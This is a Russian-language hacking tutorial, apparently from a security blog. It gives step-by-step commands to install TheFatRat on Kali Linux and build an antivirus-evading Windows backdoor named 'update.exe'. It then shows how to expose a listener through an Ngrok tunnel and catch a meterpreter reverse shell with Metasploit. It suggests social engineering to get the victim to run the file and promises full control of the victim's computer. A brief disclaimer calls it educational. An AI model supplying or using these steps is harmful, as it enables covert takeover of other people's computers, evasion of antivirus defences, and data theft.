Самый лучший способ удаленно взломать компьютер — создать полезную нагрузку (rat, троян, бэкдор), заставить запустить ее на целевом компьютере и получить удаленный доступ. Это можно сделать с помощью трояна TheFatRat. Далее покажу, как установить и использовать TheFatRat на Kali Linux взломать компьютер за пределами локальной сети.
Еще по теме: Создание RAT для Android
Что такое TheFatRat
FatRat — это мощный инструмент для создания трояна и обхода антивирусов. Бэкдор может легко обойти большинство антивирусов и поддерживать связь между хакером и целевых компьютером.
Статья написана в образовательных целях для обучения пентестеров (этичных хакеров). Для демонстрации работы, были использованы личные устройства автора. Использование подобных инструментов на чужих устройствах без надлежащего разрешения, является незаконным и расценивается, как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственность за ваши действия.
Для взлома нам понадобитьс:
- Дистрибутив Linux. В моем случае — хакерский дистрибутив Kali Linux (см. Как создать флешку Kali Linux).
- Целевой компьютер Windows.
- Ngrok — это приложение, которое позволяет создавать туннели на локальный компьютер.
- Троян TheFatRat.
Установка TheFatRat
Для установки FatRat, клонируйте репозиторий Github:
1 |
git clone https://github.com/Screetsec/TheFatRat.git |
Перейдите в каталог FatRat:
1 |
cd TheFatRat |
Измените права доступ к файлу setup.sh:
1 |
chmod +x setup.sh |
Запустить установку TheFatRat:
1 |
./setup.sh |
Создание трояна для взлома компьютера
После успешной установки можно запустить FatRat:
1 |
fatrat |
Как вы можете видеть на скрине выше, существует несколько опций создания трояна.
В качестве примера, выбериаем 6 Fud Backdoor with PwnWinds.
Теперь выбираем опцию 2, которая создаст троян с помощью C # Powershell.
Следующий шаг является важным, потому что здесь вы должны указать IP-адрес LHOST (ваш IP-адрес). Если компьютер находится в одной локальной сети, указываем локальный IP-адрес.
Чтобы взломать компьютер за пределами локальной сети необходимо установить Ngrok.
Настройка Ngrok для взлома компьютера удаленно
После установки Ngrok, откройте новый терминал и введите команду:
1 |
./ngrok tcp 8080 |
Здесь нужно скопировать сгенерированную ссылку Ngrok « 0.tcp.ngrok.io» и порт 12171.
И вставьте ссылку и порт в FatRat.
Теперь TheFatRat предложит назвать выходной файл. Я назову «update».
Затем введите 3 для использования эксплойта windows/meterpreter/reverse_tcp.
Нажмите Enter, чтобы создания трояна для взлома компьютера.
Файл бэкдора будет сохранен в каталог:
1 |
root/TheFatRat/output/update.exe |
Отправка трояна на целевой компьютер
На этом этапе нужно использовать методы социальной инженерии, но этот отдельная тема.
Итак, давайте установим прослушиватель для удаленного подключения к компьютеру.
В новом терминале введите msfconsole, чтобы запустить Metasploit (см. Как пользоваться Metasploit), и выполните следующие команды:
1 2 3 4 5 |
msf5> use exploit/multi/handler msf5> set payload windows/meterpreter/reverse_tcp msf5> set LHOST localhost msf5> set LPORT 8080 msf5> run |
Когда жертва запустит файл update.exe, вы получаете сеанс meterpreter, как показано на изображении ниже.
Теперь есть полный контроль над целевым компьютером.
Заключение
На этом все. Теперь вы знаете, как взломать компьютер. Если возникли проблемы, то это можно говорить только о том, что ваших знаний не хватает, а если это так, тогда начните изучать наш сайт. Мы уже все это проходили.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Как создать бэкдор для Android
- Как создать флешку вирус в Social-Engineer Toolkit на Kali
- Как взломать компьютер Windows 11 с помощью PowerShell